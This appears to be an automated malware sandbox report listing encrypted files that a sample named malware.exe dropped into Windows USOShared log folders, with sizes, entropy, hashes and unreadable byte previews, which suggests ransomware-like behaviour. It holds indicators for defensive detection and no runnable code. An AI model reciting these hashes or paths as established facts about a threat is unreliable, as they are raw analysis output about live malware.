                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):49260
                        Entropy (8bit):7.995713309940509
                        Encrypted:true
                        SSDEEP:1536:VgZQ5HNAOJgdQH1bIDIeYKntu7OUaL7250a3rsYghNkef:VgZQ5HNAWVUDIeHtxUaLy5VrhgDB
                        MD5:6452088E99E38B228F89458BB3CBC080
                        SHA1:928908CABF3E2F96A3E275F28249F1BBC18880D3
                        SHA-256:393E3CB2A2EBF946B3A8CE5D035FCD151FEC677D905F23CAB3EFD9FBF5C886D5
                        SHA-512:91852F25BFE1ABDCB79C8DE70B7F29583EEE23EF941CF08E7999F7142BABDD179E74BC80236D17A68903E1EA11C1AD1C34E65F4A11A9EFE339FE33980F116B3E
                        Malicious:true
                        Preview:....tQK9C....2D...6....`..Rx......SpE..n!$..u&3.(......(o.|...,j.."b..n.{...I.b.....T'L.jr.o.e....2.(....2KQ.." ......-z..b.Tm....r........u.!....[.}l ...5.........z...S>..p.6..G...ue[..t.q.ku...qkP.i..^.pD7....1.....iG...e..x.7..b.c.a.....<...U.%.....j...&M!...9.D...e..S2..k....(.....S..Xq....!.+..jE......tti)...T.O...9.ve.......B%..L..$..Q$..)._$..EY..<..R....4z!.f.... ..c\..M..5.Z\9..j...k)E....5......m..?.M.8..Ay....!......2.d.5j!.?.....>...{....$........X;?..H.f.W.^..9.....n(."R.a... @.=..h..2rp;.@...&..I..._P.m.)..<=f....&.C.2..._...~................._.....v.|.}1...dmke..n...E...2s...yt..~C.....`....?....<...)...6.[.O.$o`uX.D.=/...G........_.........&C.......aT#.c..N..@.q..B..9..*.....{D'FP9JB.z.zN...>.6`......%c.Pl..aE.n.O.P...c..f.o.......R.O.5.K.+]......:....B..mK.I..$ .3..C.....>T.[d.Y{h....<a......2..;..F$..|..yO...1tV...d.....P.E.+9.......x.....C.)Zn.a....nN...Z.....F..?.S.r,GQze.0.X.{t~....Z...P....b..@.....#...7..{i

                        C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.77f1869c-4161-4891-bcef-34ee379d1248.1.etl

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):77932
                        Entropy (8bit):7.997585362982455
                        Encrypted:true
                        SSDEEP:1536:HU+Gaylilh/qluBwoie+bky7FuCzjwec++BeW2w3S7wl:VG2bGoiTbL7FZET++BePw3S7wl
                        MD5:83FEF9DD976FA0FC8A145BDAAD73D74D
                        SHA1:6A6D3D73FDE2781F4482FC044FA785EEBBF0866D
                        SHA-256:C882ED755AAE242057768631BB89A78055D15E61F6D02973F6E45828BD98A825
                        SHA-512:794FD02AD1F69A726252B4B4C81BA75D01B83CF0CC1B2451EFBA7A8C770B5E07DE6CB3DD1606315B50C6445D7582D596F03635EBAD799ECDF831A3A608E0ED7B
                        Malicious:true
                        Preview:.... A.h.Z...W..'.F...5~~...].B...I............T.....y..S....2Xsyn.G..O...V^+Y`1..HxN.y5.l...p..Q.>Y.mT#..u3...l.:..0..L. ....F>hq/...{..0.Y.S..W(.8..X.^.P.v.b..'.fN+=..4.3.Z.)...R?.....ML.p|\.;....'jn..k.8F....B...g.np1..?...k.....@....;.T......]..>.....{.....] 3.3.!3.7..,.l..M.J..a........{...\..jw&...Wm.J..N.n..._.;.....5...y..'..u.x...n....c?....T*...v.F..i..en1Cg.*:t{.......\..Q..+......N.x...Y...w..(.u....mz$...<.'..8WR...f..p......A....aox..Tr.<P..Z}.v...\|(.....S...A.......y.5.v....a......Y.^.F........|.0.Z.zc...%W>....0..3.....F.;..N.7....kN...QF.I../..-\.......o..M`...-]<.Q....U...bQ%.U=....fw.z.:...J......}BO.q....hK...{..f...?...d.'x....td...yw.A.E.w~ ....>$`.6v|.]U.p.!8..1.d..=...r/..".q.z^...1.X..Td.%......L}w....m..=.8...65...O. =H&...,.....F.....U....R..y.....g..:...J...lQ".\.k.}....Y..<.6.5....\..i..^....v...S..........z..1.?E..kq.uL.2.........#.f...l........Y_l.b.....`B%.$..$.g......?.Yo....;.#.5....Z.]S..%.4U.A.W..&..

                        C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.77f1869c-4161-4891-bcef-34ee379d1248.2.etl

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):20588
                        Entropy (8bit):7.990650642757037
                        Encrypted:true
                        SSDEEP:384:B5yKnycwyKDdDSyEpX+B9W1gyf99E2wWoKhQxikoRMjLL/s:B4wwyK0yEAB8xO25ohiaLLU
                        MD5:B22EDBA9C8AB04D5798B3C1473FF9056
                        SHA1:BCF0E5C424269D0D2901BD47C51B5F1CD3E6816A
                        SHA-256:3D8AB712ABF6F5DD09E7BA78EFA2E179A544FBDA29A6710F34053DF1CA942BB3
                        SHA-512:2DC68ECA98F33E155DBB5C6EF9FBA20E7FFCBF57F76EC4437082591A28D95FB76726F5C3631B74409E4A0D4993BE707F53DB83F31A7F65C8C7081C7A71AB1BFD
                        Malicious:true
                        Preview:N..d.B.2..AteEc.P......:..@.`...I.r..Vl...!.NE].e.2....k....#..wT..../.C.-.r..|....|&..Q0.T]....:...&*...2...y.....m....|g.u;.R.........gg....]l3..wag..Z.c.."$..n.k.O.us.hJ....{..E..}....?;&.F...\. X...A-..&..5;.U......6....L..jo#...h.-......6n...:...w'..4t.J.d..X..1.6.. .. r.]%-.w...B$,DJ..d..n...w....(b5....s..+..[x..]}m...t..bJ.._...k/..'.Y.T6..~..:Q.5. ..+.=...|..Lf...".......>.n... .......Av..9....A?.kg..#...........s:H...p..G...\....~.X.+..^.].t.*E..l....3........G.....@Y.....%v....E.j.....u.AIh...G.m..QaA......?<.l..>...k.X!.bGi...,...q.o.h]n.f$.C.&..#.2.........A.ZR...@...B..<...%KI.G.rB........X.{.......sQ..4V.....H=.?.da..5.V{...G.......o.QX.tO`J5.....xV.../..G.....=.=..dB.G...~I...4.SS...4.$.k...7..f..GD.}.....8..!0c`......M.9.....Q8...X.7.......N.!........../.S..r...%....v.....a.H.#.$. ....|..V...E........Ho.-KC5kK....?..yCX8...9J.I..).....\.....c?.U..Fi.h.C..D.."zi.S*...{%Q..P^.l.(`.%.p._L.....Cc..2.....!=..A.6.....(.

                        C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.8485548a-2aef-4221-833c-c3035584658e.1.etl

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):77932
                        Entropy (8bit):7.997808074897647
                        Encrypted:true
                        SSDEEP:1536:OtFRbxkQahoD2lNe5+xYShRzJzqmXyczPPvH5AQoVzGKb6:OtFRbxkQaGalgdShRzJBTPvxie
                        MD5:299B4D53B3A4FFEB5F2F36C26E86A57C
                        SHA1:651514227B82EDDDE9DA1D5C60DF84D513459B2D
                        SHA-256:84588EAB357B5138E418D349954D3C85C700508C61D6AD2CE4283142D2860F75
                        SHA-512:149C7D4945A423A4E0C4C408EFE393A4A39E35906C7BBB2EECE508456D683283B6F1B709B1B1CC8FD4F39C7B9F89DA99ACD02F660986907F12EB0739D06C40D0
                        Malicious:true
                        Preview:p.......KP.7a.Hue..........=m....B.... ..Y;.a:.V]T.~7.&9..{..._..o.fB.(.G......z..*.'FZ....d6....ix...y.b.Z..e#N.yB...=....U2.h..2.C..6ny...S....f...Yuei..%h....I.%j..X...>.R.v...._...j.. ...w.....p"..j....g......T.#.qA..S....*..a....s.....c..;.Z.!^4.y..8X.gPT.....eB{..z...[rg....[w....A%.*mo.Eh.B....).S.x.q..n.q....|..kI....r|...7/>..|.b....n...RpW...l.9..r;.A..v...I..{iNp.,.{.b..#z...5..'.CY..E;.8F...f.<dh+TN.~..K.....c.`.....93f.?...^b..he.0*r.h.7.3..g....B......D~f^o.....HfQ..w.g..v\......<.b......l..Vq..A....t.`..3...O..#.a...l&.,....^.........4&....bu.k..n..DGh...}.I.(.......9.8.7....<.7.../.M....0vFr.R....N...-....#YN^......m...a.N..$w~.O..i.....R.1.H.....t.../..[.Ljxt..WD.&..7.....w._.k5..f?/s.:.rj.7~W..OEW......3s.5........R..}.%....>M?..Rc.H7.&$JE...f.."\..g.T.2++.W.T.b-.7_..~H....Y..&..r`c..a5...-.U.....$....0.~.....).N.k.B...Sj.....#.....&.....K;.......Q.S..[.K.9m.". .N(zG.?......E<.-+....yj..[....?H.:y.n\D.\...+L>....#.e..c.@.H.)

                        C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.86e0a252-c2a0-43a1-a9eb-7a55532be78d.1.etl

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):49260
                        Entropy (8bit):7.996263740945591
                        Encrypted:true
                        SSDEEP:768:tuLuOosfrYMhz4NwW9kSFNyS6+h+vMEh7HpW4eYMtDfNXGRKgfey7oqdmC:o3SF6zAyOhQBenRNvgfeA/mC
                        MD5:BE195AAC45FDA74C02EDEA5C06D56B54
                        SHA1:E29B8A00B5F6A09E9E157751D1B374AEFB856E4E
                        SHA-256:5138474957FA82FF4A1CCA2B2252407DC3B6DA48EBDCF77DA4E2501A9ECB3672
                        SHA-512:490AB9A45DE8551D4FCE53BEDB3A2DEECB0EBFC37986D3578350F06650EF673900E3E685F05DB2387082E88CCCD46B8A89A4E2503EACE74BD5FBAB6FFA8D5566
                        Malicious:true
                        Preview:.....2M82.|(.|l(F...XHS....8..ze$....v_C....tU=....M~....S...7.G.^..q....*. Ba.b....Mt.%.......2.RJ!g..%.Mq.U3\..g?k...f7..ho.....(..F..g@.....7.;.,..s.K.|z[.3x9.f....y.g....{..<...7o<D.k.2..w$)*....i..#U.|....`..u..../.{S.q.5d1vq.G....Y$. (........mr.`X.`.b ..`/P....D......z/.........7!..8.@..e.m....J.J<.....WOni.s...MX..!...q.U..._.`.*~Hm+<u..D..g&j.L2.X.B.......5...Vp..2.e...v.....|_..X85.1..K...Q.e.T.........j...W.....m.a........KL..X..G..>...WM{.......<.%...#....z.-!....1..{F....cf[....5U.y~;.0...2L6t.b.'.....@D..)z..C/|.e.=..1.>...\eKf5....B....?.&m....%.J.G#.n..........A...]..l.....Zxy..nt.p.....P.e......\{.Q.!!.py...ye....-%.T...s.5_.v.Z.n8K.-..}%....!.a.P..L0K1..Z.;8.M...YEF...z.S.q..L.......]..,.......&.L+..R.....3..Q..r...>nJ.K....]..."...Cl....J<.!y-.|..E*...a..`......U..5...Q..Le....R....,..1.a:!.b..*..W"...9.z"18..I..a^.j.d.c1..F.3.C......l......o["...6Q.....VCc..,.v.k..R...s.nB.._...ne.R....@SW/&.s..o.w..|....)..6F.NC..

                        C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.8b9a8cce-1a0e-422e-9d0f-0e651c215019.1.etl

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):49260
                        Entropy (8bit):7.996255564452985
                        Encrypted:true
                        SSDEEP:1536:MKg+y+VH7F5IHKiSgOvWRZq5ekW+HLEWQaUP+/e1ghv:6xoPI/OvWzq5WyVdUP+/eO
                        MD5:F7A2A10561F1F0BFFB97CD0082B6EB13
                        SHA1:E6E9DE98C24DA8FE272E0BCC6D7D1163CB713921
                        SHA-256:90F0FF883394C7E81FE08637AF2A4E502006596971A6CA7BBAD5E023DC185224
                        SHA-512:1F6B1DDDFA9691C9FC38FBBB713E1A5A006C828EB0823EC78575BB14072292C54BF190065A811828191B050FC6BFF491046F70E4D6D55612990DC8BC87FF4E55
                        Malicious:true
                        Preview:R.iDK*r.Xy.A...+f.......^.....|XY.4_......\%.[.$.)........z.....w(.|0.-...4...^.Z./.V.gR.x..^^>+JC..............R..>>.Y...,T....8VQ=Bt...".l,...@.R..v...".w......o!...(4.......XZ..q.s.M..;..9..(..X@...; H..nh;..<.T$.e.Up.....c...nj...&t.....V..;KPK..P...q.....4....-P.t..p..`.d......w..y....".g..qV/.|Q(..Q..>.........w..A.D...#....(`^XP2|p..O.;.,..3.=?.._k. ....w...'.a;]1..IVn..6A.N...o.....<C..@.Q.6..;"L"j...bb<.~..k......I....W....>.K,$..jp{I#.......^l..-.q......H..=.2.O&fIh..s.....Q....3..A.D...ow.W....K..?..26.....H.W#..4P<5..@0.. Is.V....k..#..!.f.....V....m.Om...6..*...7...M..7..(<.*P<V*"_YW.D#Z)....v....0......w..v..*.<-.t...+e'(.$.4.....2..D.N..R..P.%6.`w..}.{]>..L....X..j.............K}.I.{.Y.9..W..$m.:..A..8U.Y...%.......J.L..A...n.......v<"i:iA.#..R....a&.A...........q5r......~.\kd..s...0........jn..92.,.O.+.8...j.F..."}...GE..7....nI.'..B.KD...K..t>..^........fmR.R.h.....]P/...r".;........J.sv/s....)P.k'e.z .-.m

                        C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.93db6b16-048f-491f-a82d-3646e2a89960.1.etl

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):53356
                        Entropy (8bit):7.996594885362026
                        Encrypted:true
                        SSDEEP:1536:VN98xsOp02cKIFbncKW8f9WfAKXdcfze9:VN91pNlBcV8f9Wfrtcm
                        MD5:7DE1FFE161E54A7F368F59B95323B8D7
                        SHA1:6173517ACB643259BB436ACC8F58CFE65E2D8486
                        SHA-256:5EFDC48D3C35EE74C4BCABD14BFEA048D321B7E9A992CA67DEB7CDDDEE94166B
                        SHA-512:72D9314B4247AE5D6653F88CD9B9CE3152C4D06B80B59EF1BB8CD36662A87C3E39EA1E5F98D2407AC5EB99ADCEE644D60C83095D4D41DD1B6807A1C339BF6EC7
                        Malicious:true
                        Preview:../aDU...".......k....}...C.2.Ef<.....\|?........}p|..|DY4].vB0.'..Z.(..*^[..5z(....Vi.K.;....n..}..b....sf..~.L].Q..HGqo...rE.......;.b8e.M.....4.@..<T./1...0...n;.......^.-..k...N:.a$)z.}.).i.>....d.h.n}.2'.8.."{.#.....LX...K..T.q\+./.....q.j...........F.WH..U.....q...$`....3.A...9.../...N0Y..O...i.Kl.&..LN..}.W.{.2n.,>.....(.w.}.R..YZ.Kp7..Z..1|.../._...c....o....f.o,1..k;....8e.A5Y.C..%.d&.fx.SY._.(..LYN;...O.%.._A.A...rP..@Ks.b.L.../,.!.w.......8...Y......~m..UEZ.6!.....('`....Y.0Ne........ Z..........y/.....]......7.]..N.Xf.A;v.WDW.s(.7s.......3..2.%..i...><A.:.6..).v..H....7......it....-..fIn.~(.d..v..R.G..U...{.Mp..R#.".`..:".N. ...`.6.O7.....5.T..._2_).-.X].2...lWN).....<.."<.dP..N....=veC.QM.3......S.m....t..<...o.-RL.........s..1..r..B.........PU..Q..m...<...X.Z....I......... .E.........H.}...O,.!dRvRI.>..Xu....m.gew..~.....T....q..7...D.g.`...B......o..0..LI..|..ks.bm.W..+.&$...y..P#f.W..[:.T........B..*.e._O..C'.i...TH.oa.+0+

                        C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.99d47f55-28c7-42fb-b9ec-beaa25ab2fd1.1.etl

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):53356
                        Entropy (8bit):7.99607962306303
                        Encrypted:true
                        SSDEEP:1536:xj8mZF6wyyQJSejztQBGDZPXCo/++Tmzd7+:RHzrQJ/XtQgZP+jzdq
                        MD5:CAC8ED45E6A1DD313FB5B4C0FE71F9B2
                        SHA1:21F9BA1743D9E342FBFDB38B42CBE5C3E11920B8
                        SHA-256:76D8F3C8BD12DC64A6CD96D1CA206FDB9B98556EA7123DEF0C161A5F20AE78F6
                        SHA-512:046DCB8FF2EF23B4E80456E73C59BD6279277D8497C9E2147DF3EF1F10F7FC89D38A45DFA117E0D0AEDEC22EE1C28E0269F6A6E76E742F2FE9501FCE98B345C5
                        Malicious:true
                        Preview:.p.../z[...w.d...I..B.z..fQM80.H...`...O..nO.hh.<)..Z.;.W..F....G.Kc.4x....0..uy...j.Q#I..d..]..C.6.`...x...Wc..n....9..C....I."$..i.b.VD.....^.R..........U........<]z.....7p...z....|..`..]...#.W..4)......w).O.f........6z.....p.O...U*b..N..p..o9=@:T.z|M.U.`......|.:.4.......Gn....{......Y:.......W......cS...xX.u.~.Q......E.\...H..CG.j.W....D..T.Ox...L.b.;..7./.j.e..y.^a....Wk-Q....{Kc..@....7q#0.L....w....o....%9~KMHPR...B..d>...y.......1}.<`..OR?"k...c..}.....j).%..s.V.e..s53..l..,.V.6..i.$~.....~...z.d..Zh..!.....R...$.U..5i.L......#.Lc....! ..X...g.%....{.o.3@.gO..#.77..V.....@....B.....m.x.N..t.rz.....H...G...v..=......^r.#?.L...tA.1].o.P..(4......;x......."j.....m..n..Uwn>)..L..y+.0.}.2:...>R...N....9$.+u$.....z..e.6w..N...U......1\#.6!....j..U..Zg....oA......h.q.".4U...a........o.r...w..~]@...S%{.`........f{.B9.I.H......T,....?....m$S.0..&2..#.,.......:.O...f....Ab.k,.H.k9..-!.sc..v..f.k..0.....}..v.e...JB7.~D......L

                        C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.a0d81e20-2141-420e-9504-5087f6672953.1.etl

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):49260
                        Entropy (8bit):7.996305659854853
                        Encrypted:true
                        SSDEEP:1536:xRBv2uqQ+GGUvkj0/djXVWHN/eIarpDrSE+BY:Zkokej0Hpq/aO
                        MD5:EA2375D936BE71A55B1DF1F6DC7A3562
                        SHA1:EF6507F1F8B8ABA817D629CD71ED68F9A24CCD34
                        SHA-256:9C9C46790E0E07BFB8BE44DE97DD11523210D955AE434DE2799B4DB99C368D41
                        SHA-512:61FD379A2B47892AA8843DB4D63BF0D970F53B668BB74F8E33CBEFEB851450DD201E0D16AEA86C67C302DF2528ABAFFA73C90F53B09329D2E14E5479F5961693
                        Malicious:true
                        Preview:....u...D%<..#....b.....QT.....Cl,L]A~C....kC.^..R.B..H...bo.ol....i.#..K...Xm.X\.2..E?.pi....b.].....c...-.v.E.0...R.plw.......QQ..M....6.<g.@..,.)p...p....|.w.&.;.M.....>.2..@$..........2...1'[Q.........B..W.T(.._R^....f`Or.......<1.I..]....h&.<..G....v.Y...}....*B9 .-lB~*....{....Y.....?.{..+tXr.`V...:...)h,FkhY..D........'.b.. .>Z.u....a..`.(...J8e..~;...in.%:E....$....e{hPf.. .B{....H..1Z..."....=~[b...=.p..........q..o....5.n+.....-.....ze.5..~D.K....x...>w.8....W|I.....V.Z.....i|..ep8#.\.[.....)].dg%.|......!.(?.98[.>.Q..}.?|EX..]9.o.q:...G.p.+.)..)d..]AmI$....x.a..<.........Bj._...j.6...[P-.w.p..`.#......}Lk6).W.....9..W.B..c*\.V#.....d+..#..Y.I.5.4.7D.X..t.....6.u..+G..X.HX.O...'..0z.......BuT.z....Q...w.PL.&K..$l.V. .-l..._H/Z^F..s..nG...7(....?..Y=..BI...hA"}%0..h.../.......L.Yw..S.2.z.s.g7.....-..;.....n6.o.f.0.....}f.......T.....{.....9t....7.s....I.z.......".uwk.+?.r.PsH..7/.......:...w...XrM.9x.V...P...G..(j.;.%...

                        C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.bb81c698-fe7d-4d30-9989-461753efddde.1.etl

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):20588
                        Entropy (8bit):7.9910025978591985
                        Encrypted:true
                        SSDEEP:384:MwIjqO7Qfppnt+Vp6no2pvcxyElKK2XNCltTSiycfNFWC8aL8IMf:zIQfppwVp6oTaP9oti39
                        MD5:B086455EBCA6F5603170537BA8CD7FAB
                        SHA1:6E715D9A3A3F9C41B7FB9DB5D52E72A4E5D4B471
                        SHA-256:11FE8802A3EEF44EDCC60DDE5EBF5FF5FED8B0E26FE26AA608E427EC067444F4
                        SHA-512:D49E7F61F1B506640BCD873116F30F90586AD1121BCE3BD4F1935AB05F1EA20A6EEB200EECF6A12602FF0A79203F0A56AE364CACEBCC51D2CCDB2A4779D47899
                        Malicious:true
                        Preview:n....?@g...A..F,"$$C...$.m...v.NS....0.O_z#?.g...6..J..+3fU0.0..m.8....0.V.{.!.{..B.&...[........EZ..[..tK..'..R.:.(W..wq....3..... .].:.....e.r{Q...I....[.F..4M..I.......:e......'..RZN.....{H....tNW......<........j<...}....0.O.7..3.e......1*!..jks .G...}.%i.&....w&?.QQ.......R0..]r...8...O.. ZDc.']..1.1..3....95.z..@.C.M.GH.i.K..lf.-...*.RH....Q....x.}..8...b.....W3..sAOK.......O..BA.7..^G...W..JN'q.1.Rxo....`..YP.^F...oUv...q...Z....f.\........E...&.i.P.fDs..0..h.7.]..^...n.^.(.8...c..]("U...l.SkR-..\..N........[.....6......<.s....|..".........$WJl..:'.I..S.....+._(......L...4...i.Nv.Qn.}.M.qR.[.X....L2?R...4R,.i~!5.).'|H.X.@.-...D....k...Ym.&i..\.U....W?........T{.!?.F....I.GT.......J.:...=.7.._4..[.g.IX.&.2....>...T.....a71..ZY.k..V4..3...~........Fi.D...`...._....I...!jP.7.2.|.........*g.R.h&..\......E.3......1.]..[PW!..$1.._:..D.u...F/.n.DI.P.A...TB..L.#o..`V.1....J...'..#...X_..R..&......qB:.L.lC.....Q1.s...Rqr.r.....a.........Cn

                        C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.dd581e08-6d31-4ec0-90de-cdaed5f87060.1.etl

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):49260
                        Entropy (8bit):7.99624045289026
                        Encrypted:true
                        SSDEEP:1536:Ha3Uchs/Y9Z1CEKV4al7X6712uJoxZzfm0y1EB0MLRXd:HaEgs/CZ1CEWlI2+oxZ60yvQt
                        MD5:0F9D600367B628B02DE5B78EECF6C455
                        SHA1:783AB52529936AF86E642423ED6DB837FD19E332
                        SHA-256:8F0A2B920E8BA12442B08C20152E6C5C6E480D17D90C7D1B481011FD76B4B761
                        SHA-512:40841C9D78C52A8B7CEAD1BC459976BED8ED6D77A2BDEFC231402268895EBD68BACF5BA25BE01A597EBDA98A9CB708AF8F75E4C9736B1DC38FFB9FA128C4307D
                        Malicious:true
                        Preview:>-.w.w.K.(@..m&N&j....wE..L.FH.t.W%l..3.....<...k.../{....3.r.....p...*..4o.5..b....[.9......'|<mLW&..M Z...*oM."\...I......V.T%...o6."y.....`lZ..S........be.L...x......?0..2zg....em......@i..k..o.....s.....^.4.M.z(...c(.~.4le.C.r..5Y$.....f.L.O..<.g{...h...gQ..l7P..U.$}Z...c........bx.A..6i...X:.w...2.S7..P\.9HC.As.GP...,.....-+..F.K.9+...t]].un!.(V..G.q..F.-.k.0..?.[...{1..h3c.Q..B.b..2=.{7.]........9...l`|..l..5...C;..S...P...~r. ..O.}Xvt..F.........G..`.F....OF....ux..o.n.)Y.................x)..g.%./\.._.....r.e.....,;<2....8.c9p.W..I.r..0.jF.U..w......a..s.M..'"......+'.....j..`.....r...Q.A6.1T`:".}....e...{1Lg.*.(.....7#.p~.g|.0.$n..i..o...Z...?m..8.+.._.=;.h9z...Ob.K7../....R.#_.E.......;g..(.Z..i.iboL)m.'..c.tl..^r^.1.....N..b.[...C.&.As......X.&v>.........}....G%y...`s.<..@-^..8.l.t.j..@F..."..6d...B4..I.....V..l..&...4...D.c.=q.oM..J.84l.$........-&]...._....tcn.....M.a.;....%:..]lS{.1.X.%..`x.oTI{..S.Ur...g. ..o.|.$..]u..D5yB

                        C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.fccafd48-faff-4ca8-9b17-c9732cf6617f.1.etl

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):77932
                        Entropy (8bit):7.997825356637085
                        Encrypted:true
                        SSDEEP:1536:1pnruHhKyStmYJxfYuzuvvKgUdPDixVbuQVT6zDsbFMRSbEpqAWw:1hMHSthJxfYuzu6gUdL9Q5komSbEWw
                        MD5:FC2C98B51BC15BD1657BDD33DB9ADE4F
                        SHA1:C8B8257D9BA863DA333B58DE54CE4ADA24D37CB3
                        SHA-256:39293579BF98CC0E9E0E8B8D3E1605723989FD29A68E2760DB9CBECD243BC733
                        SHA-512:9D3642A278C9E2AB10BAE01800F1439F5D47B5863B25739B32E68E600A106B06BD4B91AD6C09C6C2BAD99D4229CEB63DD3C5E124C9FD439CCD1E73C20E8CF890
                        Malicious:true
                        Preview:{.6O.L.Fs.sB..Q.-.....JZ.&.z...@H.....eG....2D...0.....O.'..|. "{k5....K.v.}....l.......Q...!.r.GgpL4......Lt.....J]...#..V..2."~./.......Z...p.p5`...(*U._.Y..w..XH........ B..v..$8.pA#.S.b=..........:.W8....,.?..n..`x)'...x......H."...Ib..w9..$J..........4.......{..............7.k?..dUV0.`.%g..N..:7`.AX%eL].Mw0.4Z.mPo.O..u..9......U....!e_./.Y......&...!kDA..rR.p.._G...i0.-.>...P..eV.~.}...Q3o..)....I.o.l.:Q....Ix....][.O.>.p=. ....[0o.9...'t..wU...e.`2E.g|..,.....g...$2}S..g.Mc..TF..G/.c..E.....<#.o.u....Q|.}&...n......6.n....W.F.U.N.)6.tb....7s.......6.`!^.!7v2.. .i.L.$.29.O...!@....G..^......{k!....w.. ..j.L.t.)....T..-...\..6....B.....0o-.J1....[.Ms=40...hS..d......\..{...(j.;)....-...g...u..95...#T~.Xt..|.1WD......d.3...._.P......B[]....p&.."..u#.\.U...@./j.al....}....%*. 'f~{'...../...i.......[.....x..Z........b.BN3.....R.C8....../...%H.<...."...C./.W...2K..X..m.~.Y..J..O...IQ.o@]$............=4...-N.<_.Y....d.\-.zG....7..

                        C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.fccafd48-faff-4ca8-9b17-c9732cf6617f.2.etl

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):77932
                        Entropy (8bit):7.997847135624995
                        Encrypted:true
                        SSDEEP:1536:w5x5yQ0CpYZqIQNg776NXZr9AYLrX+gA3VabMuj6eimrKvEy8S3LWG:w5x5yQ0uIQNg77atfugA3SM+6Bmrty8Q
                        MD5:C02F48D1FF818D639043E981E24E7057
                        SHA1:B8DBA9D6E24F20C655104DA8EEF68503788A1CBC
                        SHA-256:C1B0FA93B14B8378ACF95975684BBAD6F60A2FE526891913223FBAF7A2D80B6B
                        SHA-512:696207DA175C41346A702002E8E650DA0BEE7330F0B934DD02F9E9F7A73D5B17AB2166A0F3C981DC4C4065750ED2B10D3BE4463FA481CD9DEE67ECB12F0CB232
                        Malicious:true
                        Preview:R...p.?..^Q....~n).#k.M..../.. .r:.....ek.mr.:f3...".aX.v.r...H.4..C.J.*.]Ap'.t.,hN.....-..._nT..4.YbE......I$h..X..M5..}..Hfb...:....^...p...S....b.SH.BR..QJA.o5.i.!......f...~..Q.:K....Lo....y$d..DA.9sT...Wu.....m../S9h.)6O7\...[.q.L..C...D?....UW..Z.q.V..."bEd.,....1.n}tCb.tg......&R.E.}.,.X.-..rs..in.4E.o..V..k:6`T.....+..3...|.b...........~6_...@U2.;..~.a..L|c...K.2.....c2.......M..Q...Y.DG.. .D...$........,...6..$.OL...q...[....6$..B?..t...Bwm.G..owUF. ./....l..`...?..2w(.Ag).-.L.e.?D.'!<b..i.......F._......z...j../%G..............tq.....#.....s.5@...B.w.d.............fbJz../......r..stj.S`...Z...u;M.#q.%,..z..z`.B....._.....m ...W..W.@Y..A...I7.d..".h..q..KQ.sds0...~..=....Lt..A..6....}...h..@.AK........J...n..o..r?....Si.../|.."..,..2...........~...t.a:p=.W'S.j#>CC.$...;...E......w...h.\_.1..u*...+.#c4a,V.r....X".g.o..[.....K.,./hy>.}....@Q..-...@.<h!..x......4...mTDN..0..]{...Y..h.._h..$.w.&O.mRVz...j._..b6..P......N(c.d{.{.1kr.y

                        C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.fccafd48-faff-4ca8-9b17-c9732cf6617f.3.etl

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):77932
                        Entropy (8bit):7.997433481206742
                        Encrypted:true
                        SSDEEP:1536:dw2gh+P82Q5ZYypqXK3flsCp09MXEScpd/JtiRXxP9SMAqqCgkBq:d7thQbTqXilsCp+MUjpbtyj2DtkBq
                        MD5:40085293B73666A25EAF38314F99BCE7
                        SHA1:D82F4A07038CD6097B450E14E62743D228987B88
                        SHA-256:7158E7BB5C5CEB08B9DA418B3A8A8EB1324731BB30617377894ED02F8378CF09
                        SHA-512:494BEA193DC9B909AE77C3F9A35F99154385AEF318449BA3EFD68C0780E08147B8EDF97B5BD3C7CD976223DF96BB182FF768C3C14D8343432AA9D7778B5F5209
                        Malicious:true
